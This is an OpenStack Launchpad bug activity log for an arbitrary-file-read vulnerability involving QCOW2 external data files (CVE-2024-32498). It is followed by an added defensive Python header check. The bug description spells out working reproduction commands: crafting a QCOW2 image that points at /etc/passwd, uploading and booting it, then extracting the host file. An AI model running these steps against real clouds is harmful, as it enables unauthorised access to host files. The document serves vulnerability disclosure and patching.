Nova unified patch for 2023.1 https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792029/+files/nova-2023.1-2059809.patch |
|
|
2024-06-27 17:18:16 |
Dan Smith |
attachment removed |
nova-master-2059809-additional.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792298/+files/nova-master-2059809-additional.patch |
|
|
2024-06-27 17:18:23 |
Dan Smith |
attachment removed |
nova-2024.1-2059809-additional.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792359/+files/nova-2024.1-2059809-additional.patch |
|
|
2024-06-27 17:18:30 |
Dan Smith |
attachment removed |
nova-2023.2-2059809-additional.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792361/+files/nova-2023.2-2059809-additional.patch |
|
|
2024-06-27 17:18:36 |
Dan Smith |
attachment removed |
nova-2023.1-2059809-additional.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792362/+files/nova-2023.1-2059809-additional.patch |
|
|
2024-06-27 17:20:21 |
Dan Smith |
attachment added |
|
nova-master-2059809.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792870/+files/nova-master-2059809.patch |
|
2024-06-27 17:21:04 |
Dan Smith |
attachment added |
|
Nova unified patch for 2024.1 https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792871/+files/nova-2024.1-2059809.patch |
|
2024-06-27 17:21:23 |
Dan Smith |
attachment added |
|
Nova unified patch for 2023.2 https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792872/+files/nova-2023.2-2059809.patch |
|
2024-06-27 17:21:44 |
Dan Smith |
attachment added |
|
Nova unified patch for 2023.1 https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792873/+files/nova-2023.1-2059809.patch |
|
2024-06-27 19:31:38 |
Brian Rosmaita |
attachment removed |
cinder-2059809-unified-master-WIP.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792616/+files/cinder-2059809-unified-master-WIP.patch |
|
|
2024-06-27 20:36:52 |
Dan Smith |
attachment removed |
Glance unified patch for master (with QED support) https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792869/+files/glance-master-2058089.patch |
|
|
2024-06-27 20:37:21 |
Dan Smith |
attachment added |
|
Glance unified patch for master (with QED support) https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792906/+files/glance-master-2058089.patch |
|
2024-06-28 04:39:01 |
Brian Rosmaita |
attachment added |
|
cinder-2059809-unified-master-v7.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792990/+files/cinder-2059809-unified-master-v7.patch |
|
2024-06-28 13:49:26 |
Dan Smith |
attachment removed |
Glance unified patch for master https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792016/+files/glance-master-2059809.patch |
|
|
2024-06-28 13:49:32 |
Dan Smith |
attachment removed |
Glance unified patch for 2024.1 https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792017/+files/glance-2024.1-2059809.patch |
|
|
2024-06-28 13:49:39 |
Dan Smith |
attachment removed |
Glance unified patch for 2023.2 https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792018/+files/glance-2023.2-2059809.patch |
|
|
2024-06-28 13:49:46 |
Dan Smith |
attachment removed |
Glance unified patch for 2023.1 https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792022/+files/glance-2023.1-2059809.patch |
|
|
2024-06-28 13:50:59 |
Dan Smith |
attachment added |
|
Glance unified patch for 2024.1 https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5793094/+files/glance-2024.1-2059809.patch |
|
2024-06-28 13:51:21 |
Dan Smith |
attachment added |
|
Glance unified patch for 2023.2 https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5793095/+files/glance-2023.2-2059809.patch |
|
2024-06-28 13:51:40 |
Dan Smith |
attachment added |
|
Glance unified patch for 2023.1 https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5793096/+files/glance-2023.1-2059809.patch |
|
2024-06-28 13:59:29 |
Dan Smith |
attachment added |
|
Train-ish example backport for glance https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5793098/+files/glance-train-minimal.patch |
|
2024-06-28 18:08:24 |
Brian Rosmaita |
attachment removed |
cinder-2059809-2024.1.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761489/+files/cinder-2059809-2024.1.patch |
|
|
2024-06-28 18:08:43 |
Brian Rosmaita |
attachment removed |
cinder-2059809-2023.2.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761490/+files/cinder-2059809-2023.2.patch |
|
|
2024-06-28 18:08:56 |
Brian Rosmaita |
attachment removed |
cinder-2059809-2023.1.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761491/+files/cinder-2059809-2023.1.patch |
|
|
2024-06-28 18:09:18 |
Brian Rosmaita |
attachment removed |
cinder-2059809-zed.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761492/+files/cinder-2059809-zed.patch |
|
|
2024-06-28 18:09:52 |
Brian Rosmaita |
attachment removed |
cinder-2059809-yoga.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761493/+files/cinder-2059809-yoga.patch |
|
|
2024-06-28 18:21:13 |
Brian Rosmaita |
attachment added |
|
cinder-2059809-unified-2024.1-v7.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5793292/+files/cinder-2059809-unified-2024.1-v7.patch |
|
2024-06-28 18:21:58 |
Brian Rosmaita |
attachment added |
|
cinder-2059809-unified-2023.2-v7.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5793293/+files/cinder-2059809-unified-2023.2-v7.patch |
|
2024-06-28 18:22:40 |
Brian Rosmaita |
attachment added |
|
cinder-2059809-unified-2023.1-v7.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5793294/+files/cinder-2059809-unified-2023.1-v7.patch |
|
2024-07-01 15:13:44 |
Arnaud Morin |
cve linked |
|
2022-47951 |
|
2024-07-01 16:18:00 |
Dan Smith |
attachment added |
|
late-nova-fix.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5793883/+files/late-nova-fix.patch |
|
2024-07-02 02:21:32 |
Jake Yip |
bug |
|
|
added subscriber Timothy Rice |
2024-07-02 02:39:32 |
Timothy Rice |
bug |
|
|
added subscriber Nhat Q. Ngo |
2024-07-02 02:42:04 |
Timothy Rice |
bug |
|
|
added subscriber Linh Vu |
2024-07-02 02:49:59 |
Timothy Rice |
bug |
|
|
added subscriber zrsolis |
2024-07-02 03:10:04 |
zrsolis |
bug |
|
|
added subscriber Chris Matthews |
2024-07-02 03:14:28 |
zrsolis |
bug |
|
|
added subscriber Michael Fitzgerald |
2024-07-02 03:22:11 |
zrsolis |
bug |
|
|
added subscriber Shahzaib |
2024-07-02 03:27:55 |
zrsolis |
bug |
|
|
added subscriber Nicholas Lloyd |
2024-07-02 06:01:30 |
Timothy Rice |
bug |
|
|
added subscriber Eugene de Beste |
2024-07-02 08:13:08 |
Arnaud Morin |
attachment added |
|
late-nova-fix-2.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5794139/+files/late-nova-fix-2.patch |
|
2024-07-02 08:21:56 |
Arnaud Morin |
attachment removed |
late-nova-fix-2.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5794139/+files/late-nova-fix-2.patch |
|
|
2024-07-02 08:27:53 |
Arnaud Morin |
attachment added |
|
late-nova-fix-2.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5794140/+files/late-nova-fix-2.patch |
|
2024-07-02 08:35:10 |
Eugene de Beste |
bug |
|
|
added subscriber Vladimir Prokofev |
2024-07-02 09:34:26 |
Arnaud Morin |
attachment added |
|
late-nova-fix-2-units.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5794144/+files/late-nova-fix-2-units.patch |
|
2024-07-02 13:07:07 |
Dan Smith |
bug |
|
|
added subscriber Balazs Gibizer |
2024-07-02 13:15:52 |
Dan Smith |
bug |
|
|
added subscriber sean mooney |
2024-07-02 13:32:58 |
Jeremy Stanley |
summary |
Arbitrary file access through QCOW2 external data file (CVE-2024-32498) |
[OSSA-2024-001] Arbitrary file access through QCOW2 external data file (CVE-2024-32498) |
|
2024-07-02 14:00:41 |
Arnaud Morin |
attachment removed |
late-nova-fix-2.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5794140/+files/late-nova-fix-2.patch |
|
|
2024-07-02 14:01:19 |
Arnaud Morin |
attachment removed |
late-nova-fix-2-units.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5794144/+files/late-nova-fix-2-units.patch |
|
|
2024-07-02 14:06:19 |
Jeremy Stanley |
description |
This issue is being treated as a potential security risk under
embargo. Please do not make any public mention of embargoed
(private) security vulnerabilities before their coordinated
publication by the OpenStack Vulnerability Management Team in the
form of an official OpenStack Security Advisory. This includes
discussion of the bug or associated fixes in public forums such as
mailing lists, code review systems and bug trackers. Please also
avoid private disclosure to other individuals not already approved
for access to this information, and provide this same reminder to
those who are made aware of the issue prior to publication. All
discussion should remain confined to this private bug report, and
any proposed fixes should be added to the bug as attachments. This
embargo shall not extend past 2024-07-02 and will be made
public by or on that date even if no fix is identified.
OpenStack has a security vulnerability in Nova or Glance that allows an authenticated attacker to read arbitrary files.
QCOW2 has two mechanisms to read from another file. The backing file issue was reported and fixed with OSSA-2015-014, but the external data file was not discovered.
Steps to Reproduce:
- Create a disk image: `qemu-img create -f qcow2 -o data_file=abcdefghigh,data_file_raw=on disk.qcow2 1G` with `abcdefghigh` a placeholder of the same length as the file to read. `qemu-img` will zero it.
- Replace the filename in the disk image: `sed -i "s#abcdefghigh#/etc/passwd#" disk.qcow2`.
- Upload/register the disk image: `openstack image create --disk-format qcow2 --container-format bare --file "disk.qcow2" --private "my-image"`.
- Create a new instance: `openstack server create --flavor "nano" --image "my-image" "my-instance"`.
With the non-bootable instance there might be two ways to continue:
Option 1:
- Derive a new image: `openstack server image create --name "my-leak" "my-instance"`
- Download the image: `openstack image save --file "leak.qcow2" "my-leak"`
- The file content starts at guest cluster 0
Option 2: (this is untested because I reproduced it only in a production system)
- Reboot the instance in rescue mode: `openstack server rescue --image "cirros-0.6.2-x86_64-disk" "my-instance"`.
- Go to the Dashboard, open the console of the instance and log in to the instance.
- Extract content from `/dev/sdb` with `cat /dev/sdb | fold -w 1024 | head -n 32`, `xxd -l 1024 -c 32 /dev/sdb` or similar methods.
- It might be possible to write to the host file. If the disk image is mounted with `qemu-nbd`, writes go through to the external data file. |
OpenStack has a security vulnerability in Nova or Glance that allows an authenticated attacker to read arbitrary files.
QCOW2 has two mechanisms to read from another file. The backing file issue was reported and fixed with OSSA-2015-014, but the external data file was not discovered.
Steps to Reproduce:
- Create a disk image: `qemu-img create -f qcow2 -o data_file=abcdefghigh,data_file_raw=on disk.qcow2 1G` with `abcdefghigh` a placeholder of the same length as the file to read. `qemu-img` will zero it.
- Replace the filename in the disk image: `sed -i "s#abcdefghigh#/etc/passwd#" disk.qcow2`.
- Upload/register the disk image: `openstack image create --disk-format qcow2 --container-format bare --file "disk.qcow2" --private "my-image"`.
- Create a new instance: `openstack server create --flavor "nano" --image "my-image" "my-instance"`.
With the non-bootable instance there might be two ways to continue:
Option 1:
- Derive a new image: `openstack server image create --name "my-leak" "my-instance"`
- Download the image: `openstack image save --file "leak.qcow2" "my-leak"`
- The file content starts at guest cluster 0
Option 2: (this is untested because I reproduced it only in a production system)
- Reboot the instance in rescue mode: `openstack server rescue --image "cirros-0.6.2-x86_64-disk" "my-instance"`.
- Go to the Dashboard, open the console of the instance and log in to the instance.
- Extract content from `/dev/sdb` with `cat /dev/sdb | fold -w 1024 | head -n 32`, `xxd -l 1024 -c 32 /dev/sdb` or similar methods.
- It might be possible to write to the host file. If the disk image is mounted with `qemu-nbd`, writes go through to the external data file. |
|
2024-07-02 14:06:28 |
Jeremy Stanley |
information type |
Private Security |
Public Security |
|
2024-07-02 15:11:16 |
Bartosz Bezak |
bug |
|
|
added subscriber Bartosz Bezak |
2024-07-02 16:05:19 |
OpenStack Infra |
ossa: status |
In Progress |
Fix Released |
|
2024-07-03 08:36:14 |
Hannes von Haugwitz |
bug |
|
|
added subscriber Hannes von Haugwitz |
2024-07-03 09:45:30 |
James Page |
bug task added |
|
cloud-archive |
|
2024-07-03 09:46:10 |
James Page |
nominated for series |
|
cloud-archive/caracal |
|
2024-07-03 09:46:10 |
James Page |
bug task added |
|
cloud-archive/caracal |
|
2024-07-03 09:46:10 |
James Page |
nominated for series |
|
cloud-archive/yoga |
|
2024-07-03 09:46:10 |
James Page |
bug task added |
|
cloud-archive/yoga |
|
2024-07-03 09:46:10 |
James Page |
nominated for series |
|
cloud-archive/bobcat |
|
2024-07-03 09:46:10 |
James Page |
bug task added |
|
cloud-archive/bobcat |
|
2024-07-03 09:46:10 |
James Page |
nominated for series |
|
cloud-archive/antelope |
|
2024-07-03 09:46:10 |
James Page |
bug task added |
|
cloud-archive/antelope |
|
2024-07-03 09:46:10 |
James Page |
nominated for series |
|
cloud-archive/ussuri |
|
2024-07-03 09:46:10 |
James Page |
bug task added |
|
cloud-archive/ussuri |
|
2024-07-03 09:46:30 |
James Page |
cloud-archive/antelope: status |
New |
Fix Committed |
|
2024-07-03 09:46:43 |
James Page |
cloud-archive/bobcat: status |
New |
Fix Committed |
|
2024-07-03 09:46:56 |
James Page |
cloud-archive/caracal: status |
New |
Fix Committed |
|
2024-07-03 09:47:09 |
James Page |
cloud-archive/ussuri: status |
New |
Fix Committed |
|
2024-07-03 09:47:23 |
James Page |
cloud-archive/yoga: status |
New |
Fix Committed |
|
2024-07-03 13:52:51 |
Jeremy Stanley |
bug watch added |
|
https://bugzilla.redhat.com/show_bug.cgi?id=2278875 |
|
2024-07-03 14:02:24 |
Brian Rosmaita |
attachment removed |
cinder-2059809-unified-master-v7.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792990/+files/cinder-2059809-unified-master-v7.patch |
|
|
2024-07-03 14:02:56 |
Brian Rosmaita |
attachment removed |
cinder-2059809-unified-2024.1-v7.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5793292/+files/cinder-2059809-unified-2024.1-v7.patch |
|
|
2024-07-03 14:03:21 |
Brian Rosmaita |
attachment removed |
cinder-2059809-unified-2023.2-v7.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5793293/+files/cinder-2059809-unified-2023.2-v7.patch |
|
|
2024-07-03 14:04:03 |
Brian Rosmaita |
attachment removed |
cinder-2059809-unified-2023.1-v7.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5793294/+files/cinder-2059809-unified-2023.1-v7.patch |
|
|
2024-07-03 16:24:40 |
OpenStack Infra |
nova: status |
In Progress |
Fix Released |
|
2024-07-03 18:34:51 |
Lukasz Zalewski |
bug |
|
|
added subscriber Lukasz Zalewski |
2024-07-03 20:08:06 |
OpenStack Infra |
cinder: status |
In Progress |
Fix Released |
|
2024-07-04 09:21:21 |
OpenStack Infra |
glance: status |
In Progress |
Fix Released |
|
2024-07-04 09:31:23 |
Nobuto Murata |
bug |
|
|
added subscriber Nobuto Murata |
2024-07-04 21:51:23 |
Vladimir Prokofev |
removed subscriber Vladimir Prokofev |
|
|
|
2024-07-06 22:41:35 |
OpenStack Infra |
tags |
|
in-unmaintained-zed |
|
2024-07-08 12:58:20 |
James Page |
cve linked |
|
2023-2088 |
|
2024-07-08 12:58:24 |
James Page |
cloud-archive/caracal: status |
Fix Committed |
Fix Released |
|
2024-07-08 13:00:55 |
James Page |
cloud-archive/bobcat: status |
Fix Committed |
Fix Released |
|
2024-07-08 13:02:22 |
James Page |
cloud-archive/antelope: status |
Fix Committed |
Fix Released |
|
2024-07-08 13:05:28 |
James Page |
cve linked |
|
2020-10755 |
|
2024-07-08 13:05:32 |
James Page |
cloud-archive/yoga: status |
Fix Committed |
Fix Released |
|
2024-07-09 08:13:54 |
Chris Valean |
bug |
|
|
added subscriber Chris Valean |
2024-07-10 22:44:53 |
Julius |
bug |
|
|
added subscriber Julius |
2024-08-13 10:52:56 |
OpenStack Infra |
tags |
in-unmaintained-zed |
in-unmaintained-yoga in-unmaintained-zed |
|
2024-08-19 08:32:29 |
James Page |
cloud-archive: status |
Fix Released |
Fix Committed |
|
2024-08-21 14:24:08 |
James Page |
cloud-archive: status |
Fix Committed |
Fix Released |
|
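The bug description in this log names two QCOW2 mechanisms for reading from another file: the backing file and the external data file. The following is an added example, not the Nova, Glance or Cinder patch attached to this bug, of an upload-time header check that refuses both. The offsets, the feature bit and the extension type are taken from the QCOW2 format specification; the function names and the sample header are constructed for illustration.

```python
import struct

QCOW2_MAGIC = b"QFI\xfb"
INCOMPAT_EXTERNAL_DATA = 1 << 2   # incompatible-features bit 2
EXT_END = 0x00000000              # end-of-extensions marker
EXT_DATA_FILE = 0x44415441        # external data file name extension


def inspect_qcow2(buf: bytes) -> dict:
    """Report every reference to another file found in a QCOW2 header."""
    if len(buf) < 72 or buf[:4] != QCOW2_MAGIC:
        raise ValueError("not a QCOW2 header")
    version, backing_off, backing_len = struct.unpack_from(">IQI", buf, 4)
    incompat, header_len = 0, 72          # v2: fixed 72-byte header
    if version >= 3:
        if len(buf) < 104:
            raise ValueError("truncated v3 header")
        incompat = struct.unpack_from(">Q", buf, 72)[0]
        header_len = struct.unpack_from(">I", buf, 100)[0]
        if header_len < 104:
            raise ValueError("implausible header_length")
    found = {"backing_file": None, "data_file": None,
             "data_file_bit": bool(incompat & INCOMPAT_EXTERNAL_DATA)}
    if backing_off:
        found["backing_file"] = buf[backing_off:backing_off + backing_len]
    pos = header_len
    while pos + 8 <= len(buf):            # walk the header extensions
        ext_type, ext_len = struct.unpack_from(">II", buf, pos)
        if ext_type == EXT_END:
            break
        if ext_type == EXT_DATA_FILE:
            found["data_file"] = buf[pos + 8:pos + 8 + ext_len]
        pos += 8 + ((ext_len + 7) & ~7)   # extension data is padded to 8 bytes
    return found


def reject_reason(buf: bytes):
    """Why an image declared as qcow2 must be refused, or None if self-contained."""
    try:
        found = inspect_qcow2(buf)
    except ValueError as exc:
        return f"unparseable: {exc}"      # fail closed
    # Either signal alone is enough: never trust the bit and extension to agree.
    if found["data_file_bit"] or found["data_file"] is not None:
        return "external data file"
    if found["backing_file"] is not None:
        return "backing file"
    return None


def build_header(data_file: bytes = b"", incompat: int = 0) -> bytes:
    """Constructed v3 header used as sample input (not a usable disk image)."""
    hdr = bytearray(104)
    hdr[:4] = QCOW2_MAGIC
    struct.pack_into(">I", hdr, 4, 3)     # version
    struct.pack_into(">Q", hdr, 72, incompat)
    struct.pack_into(">I", hdr, 100, 104)  # header_length
    if data_file:
        pad = b"\0" * (-len(data_file) % 8)
        hdr += struct.pack(">II", EXT_DATA_FILE, len(data_file)) + data_file + pad
    return bytes(hdr) + struct.pack(">II", EXT_END, 0)
```

Pass the check enough leading bytes of the upload to reach the end-of-extensions marker, and run it on the stored bytes rather than on the format the uploader declares.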